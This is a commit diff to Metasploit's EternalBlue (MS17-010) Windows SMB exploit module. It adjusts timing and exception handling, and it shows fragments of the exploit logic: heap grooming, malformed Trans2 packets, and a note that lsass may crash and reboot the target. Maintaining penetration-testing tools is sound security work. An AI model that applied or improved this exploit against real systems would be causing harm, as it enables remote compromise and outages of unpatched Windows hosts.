Tweak exception handling and timing of ms17_010_eternalblue

asoto-r7 · asoto-r7 · commit af45c1764b23 · 2018-02-21T13:40:04.000-06:00
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -59,7 +59,8 @@ def initialize(info = {})
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'  => 5,
         },
       'Privileged'     => true,
       'Payload'        =>
@@ -120,7 +121,7 @@ def exploit
         # we don't need this sleep, and need to find a way to remove it
         # problem is session_count won't increment until stage is complete :\
         secs = 0
-        while !session_created? and secs < 5
+        while !session_created? and secs < 30
           secs += 1
           sleep 1
         end
@@ -139,16 +140,24 @@ def exploit
 
     rescue EternalBlueError => e
       print_error("#{e.message}")
+      return false
+    rescue ::RubySMB::Error::NegotiationFailure
+      print_error("SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.")
+      return false
     rescue  ::RubySMB::Error::UnexpectedStatusCode,
             ::Errno::ECONNRESET,
             ::Rex::HostUnreachable,
             ::Rex::ConnectionTimeout,
-            ::Rex::ConnectionRefused  => e
+            ::Rex::ConnectionRefused,
+            ::RubySMB::Error::CommunicationError => e
       print_error("#{e.class}: #{e.message}")
+      report_failure
+      return false
     rescue => error
       print_error(error.class.to_s)
       print_error(error.message)
       print_error(error.backtrace.join("\n"))
+      return false
     ensure
       # pass
     end
@@ -286,14 +295,15 @@ def print_core_buffer(os)
     end
   end
 
+  '''
   #
   # Increase the default delay by five seconds since some kernel-mode
   # payloads may not run immediately.
   #
   def wfs_delay
     super + 5
   end
-
+  '''
 
   def smb2_grooms(grooms, payload_hdr_pkt)
     grooms.times do |groom_id|
@@ -337,7 +347,11 @@ def smb1_large_buffer(client, tree, sock)
     vprint_status("Sending malformed Trans2 packets")
     sock.put(trans2_pkt_nulled)
 
-    sock.get_once
+    begin
+      sock.get_once
+    rescue EOFError
+      vprint_error("No response back from SMB echo request.  Continuing anyway...")
+    end
 
     client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
   end
